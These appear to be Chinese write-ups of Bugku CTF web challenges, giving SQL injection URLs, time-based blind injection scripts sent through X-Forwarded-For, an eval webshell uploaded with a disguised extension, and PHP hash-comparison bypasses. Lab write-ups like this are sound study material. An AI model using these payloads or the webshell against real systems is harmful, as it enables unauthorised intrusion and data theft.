页面上给的是一串重复的东西,也没看出来是啥
倒是地址栏有很明显base64加密
a2V5cy50eHQ=
解开是keys.txt
吧这个位置换成加密的index.php看看,是有回显的
http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw每次改变他的line值会显示不同行的php代码用python给他爬出来
import requests
for i in range(30):url='http://123.206.87.240:8002/web11/index.php?line='+str(i)+'&filename=aW5kZXgucGhw'r=requests.get(url)print(r.text)
跑一下得到:
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';
}if(in_array($file, $file_list)){$fa = file($file);
echo $fa[$line];
}
?>
最直接就是$_COOKIE['margin']=='margin'了我们进到keys.php(base64加密)用hackbar传一个cooick的值margin=margin进去右键查看源码就好了
never give up
进去地址栏有个id=1直接改这个没反应
f12发现
<!--1p.html-->
于是到1p.html看看
直接进页面好像是进不去的
那就view-source:123.206.87.240:8006/test/1p.html
直接看源码发现有一段加密了先用url解码得到
"<script>window.location.href='http://www.bugku.com';</script>
<!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->"
再把中间的用base64解码
%22%3Bif%28%21%24_GET%5B%27id%27%5D%29%0A%7B%0A%09header%28%27Location%3A%20hello.php%3Fid%3D1%27%29%3B%0A%09exit%28%29%3B%0A%7D%0A%24id%3D%24_GET%5B%27id%27%5D%3B%0A%24a%3D%24_GET%5B%27a%27%5D%3B%0A%24b%3D%24_GET%5B%27b%27%5D%3B%0Aif%28stripos%28%24a%2C%27.%27%29%29%0A%7B%0A%09echo%20%27no%20no%20no%20no%20no%20no%20no%27%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20@file_get_contents%28%24a%2C%27r%27%29%3B%0Aif%28%24data%3D%3D%22bugku%20is%20a%20nice%20plateform%21%22%20and%20%24id%3D%3D0%20and%20strlen%28%24b%29%3E5%20and%20eregi%28%22111%22.substr%28%24b%2C0%2C1%29%2C%221114%22%29%20and%20substr%28%24b%2C0%2C1%29%21%3D4%29%0A%7B%0A%09require%28%22f4l2a3g.txt%22%29%3B%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20%21%21%21%22%3B%0A%7D%0A%0A%0A%3F%3E
再用url解
";if(!$_GET['id'])
{header('Location: hello.php?id=1');exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{echo 'no no no no no no no';return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{require("f4l2a3g.txt");
}
else
{print "never never never give up !!!";
}?>
可以看到有一个f4l2a3g.txt文件直接访问view-source:http://123.206.87.240:8006/test/f4l2a3g.txt
得到flag
welcome to bugkuctf
靶场进不去
过狗一句话
靶场进不去
字符?正则?
<?php
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ die('key is: '.$key);
}
?>
就一个正则
通过get传一个id进去
这个id要符合/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i这个正则
. 匹配除 "\n" 之外的任何单个字符
* 匹配它前面的表达式0次或多次,等价于{0,}
{4,7} 最少匹配 4 次且最多匹配 7 次,结合前面的 . 也就是匹配 4 到 7 个任意字符
\/ 匹配 / ,这里的 \ 是为了转义
[a-z] 匹配所有小写字母
[:punct:] 匹配任何标点符号
/i 表示不分大小写
就见payloadhttp://120.24.86.145:8002/web10/?id=keykeyaaaakey:/a/keya:flag就出来了
前女友(SKCTF)
刚打开啥都不知道,查看源码发现链接俩字那里有链接点一下跳另外一个页面
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){$v1 = $_GET['v1'];$v2 = $_GET['v2'];$v3 = $_GET['v3'];if($v1 != $v2 && md5($v1) == md5($v2)){if(!strcmp($v3, $flag)){echo $flag;}}
}
?>
要求v1不等于v2md5(v1)=MD5(v2)v3等于$flag
那v1 v2找一个MD5之后是0e开头的就可以绕过了 但是v3怎么办
在查strcmp的时候看见一个相关漏洞
在5.3之前的php中,果我们传入非字符串类型的数据的时候,显示了报错的警告信息后,将return 0 !!! 也就是虽然报了错,但却判定其相等了。那么只要v3传个数组进去,flag就出来了
payloadhttp://123.206.31.85:49162/?v1=s878926199a&v2=s155964671a&v3[]=12
login1(SKCTF)
题目提示sql约束攻击
进去是一个普通的登录界面,先注册个账号看看,登录提示不是管理员
因为注册的时候密码有大小写数字爆破有难度
就去查了一下sql约束有一个是再sql查询的时候自动去空格admin=admin ___
那就注册一个admin___让再判断是否为管理员的的时候返回ture就好了登录flag就出来了
你从哪里来
进去就问我是不是来自谷歌,bp抓包加个referer:https://www.google.com就说我来自谷歌就好了
md5 collision(NUPT_CTF)
题目是MD5 collision 让我输入a通过地址栏传一个a=1进去返回false那就传个MD5之后0e开头的flag就出来了
payloadhttp://123.206.87.240:9009/md5.php?a=s878926199a
md5之后0e开头的
因为做过好几道md5 collision的题就对做过做个整理
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
程序员本地网站
之前过的管理员系统是类似的直接在包头加上X-FORWARDED-FOR:127.0.0.1就好了
各种绕过
<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {if ($_GET['uname'] == $_POST['passwd'])print 'passwd can not be uname.';else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))die('Flag: '.$flag);elseprint 'sorry!';}
?>
id=margin uname不等于passwd sha1之后相等
我再找sha1之后相等的支付的时候找到
sha1比较数组漏洞: uname[]=1&passwd[]=23 即可绕过 (注:数组数字可任意)
payload ge:thttp://123.206.87.240:8002/web7/?id=margin&uname[]=1post:passwd[]=23
flag就出来了
web8
题目提示txt???先进靶场
<?php
extract($_GET);
if (!empty($ac))
{$f = trim(file_get_contents($fn));
if ($ac === $f)
{echo "<p>This is flag:" ." $flag</p>";
}
else
{echo "<p>sorry!</p>";
}
}
?>
进到flag.txt看看
里面显示flags
那么ac就是flag.txt的内容flags fn就是flag.txt文件名
payloadhttp://123.206.87.240:8002/web8/?ac=flags&fn=flag.txt
flag就出来了
细心
靶场进不去
求getshell
他要我传一个image文件不要php文件,看上去就是一个文件上传的题
先见传个一句话返回文件错误,用bp改参数刚开始就知道两个一个是文件名一个是请求数据的Content-Type,文件名就一个一个尝试,Content-Type用图片的就可以,但是怎么尝试都不行,后来查了一下发现头部还有一个 Content-Type 大小写绕过一下就好
INSERT INTO注入
error_reporting(0);function getIp(){ //获取ip
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ //读取报头里的HTTP_X_FORWARDED_FOR
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];}$host="localhost";
$user="";
$pass="";
$db="";$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");mysql_select_db($db) or die("Unable to select database");$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')"; //要注入的语句
mysql_query($sql);
先看看题目给的源码。提示提示写python脚本,因为没有报错点只能用时间盲注了。
import requestsdic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUZWXYZ_'
#猜解数据库名称的payload
payload_db = "1'+(select case when (substr(database() from {0} for 1)='{1}') then sleep(6) else 1 end)+'1"
#猜解表数量的payload
payload_tb_num = "1'+(select case when (select count(*) from information_schema.TABLES where TABLE_SCHEMA='{0}')='{1}' then sleep(6) else 1 end)+'1"
#猜解表名字长度的payload,注:其实也可不猜解长度,直接猜解具体字符,当发现名称字符串不变时(即不再捕获到ReadTimeout异常添加字符时)说明猜解完成
payload_tb_name_len = "1'+(select case when (select length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) = '{2}' then sleep(6) else 1 end)+'1"
#猜解表名字的payload
payload_tb_name = "1'+(select case when (substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) from {2} for 1)) = '{3}' then sleep(6) else 1 end)+'1"
url = 'http://123.206.87.240:8002/web15/'db_name = ''
#数据库名破解
for i in range(1,6):for j in dic:try:headers = {'x-forwarded-for':payload_db.format(i,j)}res = requests.get(url,headers=headers,timeout=5)except requests.exceptions.ReadTimeout:print(payload_db.format(i,j))db_name += jbreak
print('db_name: ' + db_name) #运行后可知数据库名为web15
#表数量破解
tb_num = 0
for i in range(1,50):try:headers = {'x-forwarded-for':payload_tb_num.format(db_name,str(i))}res = requests.get(url,headers=headers,timeout=5)except requests.exceptions.ReadTimeout:tb_num = iprint('tb_num: '+str(i))break
#运行后可知有两个表
#表名破解
len = 0
for i in range(tb_num):#crack length firstfor j in range(50):try:headers = {'x-forwarded-for':payload_tb_name_len.format(db_name,i,j)}res = requests.get(url,headers=headers,timeout=5)except requests.exceptions.ReadTimeout:len = jbreakprint('No.'+str(i+1)+' table has length: ' + str(len))#crack nametb_name = ''for k in range(1,len + 1):for j in dic:try:headers = {'x-forwarded-for':payload_tb_name.format(db_name,i,k,j)}res = requests.get(url,headers=headers,timeout=5)except requests.exceptions.ReadTimeout:print(payload_tb_name.format(db_name,i,k,j))tb_name += jbreakprint(tb_name)#运行后可知两个表为flag和client_ippython不行这个是网上拉的,自己跑了了一下就看看懂可以改
import requestsurl="http://123.206.87.240:8002/web15/"flag=""for i in range(1,33):for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.":data="1' and (case when (substr((select group_concat(flag) from flag) from " + str(i)+" for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"headers={'X-ForWarded-For':data}try:result=requests.get(url,headers=headers,timeout=3)except requests.exceptions.ReadTimeout:flag+=str1print(flag)breakprint(flag)
跑完flag就出来了。。。。
这是一个神奇的登陆框
进去就一个登陆界面,地址来看有个sql应该还是失去了注入题那就开始找注入点
用1"的时候出现报错
Try Again!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1"' at line 1
输入1" #又正常了那就是"闭合
1" order by 2 #正常1" order by 3 #返回
Unknown column '3' in 'order clause'
那就是两个字段
-1" union select 1, 2 #手历一下
返回
Good Job!
Login_Name:1
You must login with correct ACCOUNT and PASSWORD!
爆库
-1" union select database(),2#
得到库名bugkusql1
爆表
-1" union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#
得到表名flag1,whoami
爆字段
-1" union select group_concat(column_name),2 from information_schema.columns where table_name='flag1'#
得到字段flag1
查数据开始
-1" union select group_concat(flag1),2 from flag1 #
flag 就出来了
-1" union select *,2 from flag1 #
这样也是可以的就可以不用去查字段了
多次
进去地址栏又个id=1改了会显示不同的字一直到5,之后就出现
Error,Error,Error!
很明显的注入题
再id=5的时候他让我给我尝试sql注入,那就直接开始
id=1'报错
id=1"不报错
所以是'闭合
确定存在注入点
试了一下发现是有过滤的
用异或注入来判断一下
payloadhttp://123.206.87.240:9004/1ndex.php?id=1'^(length('and')!=0)--+
判断出来过滤了and,or,union,select
这边可以用双写绕过
用order by来判断字段数http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+
2的时候不报错3的时候报错了
手历一下
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,2 --+
显示2
爆库:
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,database() --+
web1002-1
爆表
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema="web1002-1"--+
flag1,hint
爆字段
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name="flag1"--+
flag1,address
查数据
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(flag1) from flag1--+
usOwycTju+FTUUzXosjr
去试了一下这个不是 那就去拿address里的数据
http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(address) from flag1--+
得到下一关地址
也是地址栏来传id
'闭合注入点有了
这关双写绕过和大小写绕过都过滤了,那就用报错注入
http://123.206.87.240:9004/Once_More.php?id=1' order by 2--+返回正常
3报错 Unknown column '3' in 'order clause'
那就是两个字段
爆表
http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e,database(),0x7e)))--+
得到XPATH syntax error: '~web1002-2~'
爆表
http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema="web1002-2"),0x7e)))--+
得到XPATH syntax error: '~class,flag2~'
爆字段
http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name="flag2"),0x7e)))--+
得到XPATH syntax error: '~flag2,address~'
查数据
http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(flag2) from flag2),0x7e)))--+
得到XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'
把B改小写就是了
去看一下第三关
XPATH syntax error: '~./Have_Fun.php~'
进去是空白页面,查看下源码
<!DOCTYPE html>
<html>
<head><title>Have_Fun</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- <style>
html,body{padding: 0;margin: 0;background-color: #fff;
}
Only IP'1234' can access this site.
<style> -->
</head>
<body>
</body>
</html>
<center><font color= '#fff'>YOUR IP:39.172.208.228<br />Sorry,Only IP:192.168.0.100 Can Access This Site<br /><br></font></center>
需要抓包改,晚点再回来研究
PHP_encrypt_1(ISCCCTF)
一个压缩包里面是index.php题目上给出fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=
<?php
function encrypt($data,$key)
{$key = md5('ISCC');$x = 0;$len = strlen($data);$klen = strlen($key);for ($i=0; $i < $len; $i++) { if ($x == $klen){$x = 0;}$char .= $key[$x];$x+=1;}for ($i=0; $i < $len; $i++) {$str .= chr((ord($data[$i]) + ord($char[$i])) % 128);}return base64_encode($str);
}
?>
大概理解了,就是我密钥提供一个字符串用这个函数运行后变成题目给的那个字符串,那就是要我直接写一个解密程序
<?phpfunction decrypt()
{$miwen = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="; //这是给定的进行base64编码过后的密文$mi1 = base64_decode($miwen); //先进行base64解码$char ="";$str="";$len = strlen($mi1); //获取密文长度$key = md5('ISCC'); //与加密函数中的相同操作,目的是在后续得到与加密过程中使用的相同的密钥。$x = 0;$klen = strlen($key); //key的长度for ($s=0; $s < $len; $s++) {if ($x == $klen){$x = 0;}$char .= $key[$x]; //每次截取key的第x位并拼接给char(char作为最终的加密密钥),在这里便得到了加密密钥,这里的加密密钥和解密密钥相同。$x+=1;}for ($i=0; $i < $len; $i++) { //后面是解密的核心$xia = ord($mi1[$i])-ord($char[$i]) ; //加密过程中这一步是两者相加并对128做模运算(取余)。if($xia < 0){$str .= chr($xia+128);}else{$str .= chr((ord($mi1[$i]) - ord($char[$i])) % 128); //将data和char的第i位字符的ascii码相加并与128取模得到新的字符(也即是密文)}}echo $str."\n";
}
decrypt();
?>
跑一下flag就出来了
文件包含2
提示文件包含
地址http://123.206.31.85:49166/index.php?file=hello.php
查看源码<!-- upload.php -->开头提示upload.php
上一句话改后缀,上传成功,但是不管这直接访问还是用文件包含菜刀和蚁剑都连不上去,
后来把一句话改了
<script language=php>echo 'a'; eval($_POST['pass']);</script>
文件名改了a.php;.jpg上传成功,文件包含读取返回一个a,用蚁剑直接脸上,找到一个this_is_th3_F14g_154f65sd4g35f4d6f43.txt的文件打开就是flag
flag.php
怎么点login都没反应
回去看题目给的提示
提示:hint
看源码也没东西
只能去找大佬的wp了
看大佬们都是通过get传一个hint=1进去源码就出来了,但是我试了试了得到了
<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{ echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center"><form method="POST" action="#"><p><input name="user" type="text" placeholder="Username"></p><p><input name="password" type="password" placeholder="Password"></p><p><input value="Login" type="button"/></p></form>
</div>
</body>
</html><?php
}
$KEY='ISecer:www.isecer.com';
?>
看了一些不是很麻烦传个cookie过去这有个坑
这个$key是再下面的所以再上面半个语句里是未定义的。
所以unserialize($cookie)返回的是null
所以我们要传一个s:0:" ";
只要构建cookie: ISecer=s:0:" ";就好了
我用火狐直接传不行就用bp抓包改了cookie,flag就出来了
sql注入2
题目提示全都tm过滤了绝望吗?提示 !,!=,=,+,-,^,%
随便试了一下用户名为admin的时返回密码错误,那账号就确定了,那就密码,本来想用爆破的,但是密码有点长。。。。。
还是好好做题吧
但是。。我直接地址栏后面跟http://123.206.87.240:8007/web2/flag就把flag下载下来了。。。。
孙xx的博客
这题一点感觉都没有题号好像改了,也找不到wp。。。
Trim的日记本
拿御剑一扫描有一个http://123.206.87.240:9002/show.php
进去flag就出来了
login2(SKCTF)
题目提示命令执行
靶场坏了,一直提示无法链接数据库
login3(SKCTF)
题目提示基于布尔的sql盲注
有提示无法链接数据库
文件上传2(湖湘杯)
页面打不开
江湖魔头
先放一放太难了
login4
题目提示CBC字节翻转攻击
进去是登录框,随便输入说我不是管理员,用admin登录又说管理员不需要登录,抓包看看
cookie里面有
Cookie: PHPSESSID=geaegok09kdgpv30reekm2uvb5; user=UTw%2BPCx%2FempFfml9eypON1KVb1YjKDBlbWx3mTBbdSIVFBRhoQ%3D%3D
先去查一下什么是CBC字节翻转攻击
找到一篇很详细的博客https://blog.csdn.net/csu_vc/article/details/79619309
御剑扫一下发先有一个index.php.swp
到linux下,用命令 vim -r index.php.swp 就可以恢复,源码搞下来
<!DOCTYPE html PUBLIC "-//W4C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Login Form</title><link href="static/css/style.css" rel="stylesheet" type="text/css"/><script type="text/javascript" src="static/js/jquery.min.js"></script><script type="text/javascript">$(document).ready(function () {$(".username").focus(function () {$(".user-icon").css("left", "-48px");});$(".username").blur(function () {$(".user-icon").css("left", "0px");});$(".password").focus(function () {$(".pass-icon").css("left", "-48px");});$(".password").blur(function () {$(".pass-icon").css("left", "0px");});});</script>
</head><?php
define("SECRET_KEY", file_get_contents('/root/key'));
define("METHOD", "aes-128-cbc");
session_start();function get_random_iv()
{$random_iv = '';for ($i = 0; $i < 16; $i++) {$random_iv .= chr(rand(1, 255));}return $random_iv;
}function login($info)
{$iv = get_random_iv();$plain = serialize($info);$cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);$_SESSION['username'] = $info['username'];setcookie("iv", base64_encode($iv));setcookie("cipher", base64_encode($cipher));
}function check_login()
{if (isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])) {$cipher = base64_decode($_COOKIE['cipher']);$iv = base64_decode($_COOKIE["iv"]);if ($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)) {$info = unserialize($plain) or die("<p>base64_decode('" . base64_encode($plain) . "') can't unserialize</p>");$_SESSION['username'] = $info['username'];} else {die("ERROR!");}}
}function show_homepage()
{if ($_SESSION["username"] === 'admin') {echo '<p>Hello admin</p>';echo '<p>Flag is $flag</p>';} else {echo '<p>hello ' . $_SESSION['username'] . '</p>';echo '<p>Only admin can see flag</p>';}echo '<p><a href="loginout.php">Log out</a></p>';
}if (isset($_POST['username']) && isset($_POST['password'])) {$username = (string)$_POST['username'];$password = (string)$_POST['password'];if ($username === 'admin') {exit('<p>admin are not allowed to login</p>');} else {$info = array('username' => $username, 'password' => $password);login($info);show_homepage();}
} else {if (isset($_SESSION["username"])) {check_login();show_homepage();} else {echo '<body class="login-body"><div id="wrapper"><div class="user-icon"></div><div class="pass-icon"></div><form name="login-form" class="login-form" action="" method="post"><div class="header"><h1>Login Form</h1><span>Fill out the form below to login to my super awesome imaginary control panel.</span></div><div class="content">
<input name="username" type="text" class="input username" value="Username" onfocus="this.value=\'\'" /><input name="password" type="password" class="input password" value="Password" onfocus="this.value=\'\'" /></div><div class="footer"><input type="submit" name="submit" value="Login" class="button" /></div></form></div></body>';}
}
?>
</html>
bugku web篇相关推荐
- return error怎么定义_SpringBoot 系列 web 篇之自定义返回 Http Code 的 n 种姿势
200105-SpringBoot 系列 web 篇之自定义返回 Http Code 的 n 种姿势 虽然 http 的提供了一整套完整.定义明确的状态码,但实际的业务支持中,后端并不总会遵守这套规则 ...
- boot返回码规范 spring_SpringBoot 系列 web 篇之自定义返回 Http Code 的 n 种姿势
200105-SpringBoot 系列 web 篇之自定义返回 Http Code 的 n 种姿势 虽然 http 的提供了一整套完整.定义明确的状态码,但实际的业务支持中,后端并不总会遵守这套规则 ...
- spring boot 跨域请求_SpringBoot 系列教程 web 篇之自定义请求匹配条件 RequestCondition...
191222-SpringBoot 系列教程 web 篇之自定义请求匹配条件 RequestCondition 在 spring mvc 中,我们知道用户发起的请求可以通过 url 匹配到我们通过@R ...
- [Bugku][Web][CTF] 9-15 write up
[说明] 整合资源 简略版本2020Bugku write up Bugku Web第九题 关键字 :/?args=GLOBALS PHP 将所有全局变量存储在一个名为 $GLOBALS[index] ...
- JAVA WEB篇4——Filter、Listener
JAVA WEB篇4--Filter.Listener 1.Filter Filter本意为"过滤"的含义,是JavaWeb的三大组件之一,三大组件为:Servlet.Filter ...
- JAVA WEB篇3——JSP
JAVA WEB篇3--JSP 1.JSP是什么 JSP是Java Server Pages的简称,跟Servlet一样可以动态生成HTML响应, JSP文件命名为 xxx.jsp 与Servlet不 ...
- JAVA WEB篇2——Servlet
JAVA WEB篇2--Servlet Servlet(Server Applet)是Java Servlet的简称,称为小服务程序或服务连接器,是Java语言编写 的服务器端程序,换句话说,Serv ...
- JAVA WEB篇1——初识JAVAWEB
JAVA WEB篇1--初识JAVAWEB JavaWeb主要指使用Java语言进行动态Web资源开发技术的统称,是解决相关Web互联网领域的技术总和 1.Http协议 HTTP协议(HyperTex ...
- CTF之旅WEB篇(3)--ezunser PHP反序列化
一.审题 对方朝你扔过来一串代码(当然这次又是蹭的题只说过程和思路): <?php highlight_file(__FILE__); class A{public $name;public $ ...
最新文章
- H.265的NALU
- 黑马程序员:java基础之装饰设计模式
- C#程序开发中经常遇到的10条实用的代码
- sync是同步还是非同步_音视频是怎么保持同步的?(四)
- Flutter - 生成二维码与识别二维码
- 面试题:InnoDB 中一棵 B+ 树能存多少行数据?【面试不翻车,翻车就跑路】
- 仿站小技巧20190409
- 安装appach时出现没有安装gcc的错误,用yum安装gcc时yum出现错误(修改yum配置)...
- 5教程 watchout_WATCHOUT大屏拼接融合系统
- 锂电池电量百分比计算_怎样估计锂电池剩余电量SOC
- 信息系统项目管理师必背核心考点(六十二)项目组合治理主要过程
- excel怎么拆分表格
- 输入一个字符串,将字符串中的大写字母改成小写字母,小写字母不变,其他字符忽略,然后输出转换之后的结果。
- android应用是非正式版本,华为手机自带浏览器,应用是非正式发布版本,当前设备不支持安装
- 怎么在C语言软件上验证程序,一种验证指针程序的方法
- 锁相环(PLL)低杂散方案设想
- jdk的下载/安装/配置
- 死磕Spring源码-常见底层核心注解
- 凡人无法打开的文件2
- 利盟Lexmark M3150dn 打印机驱动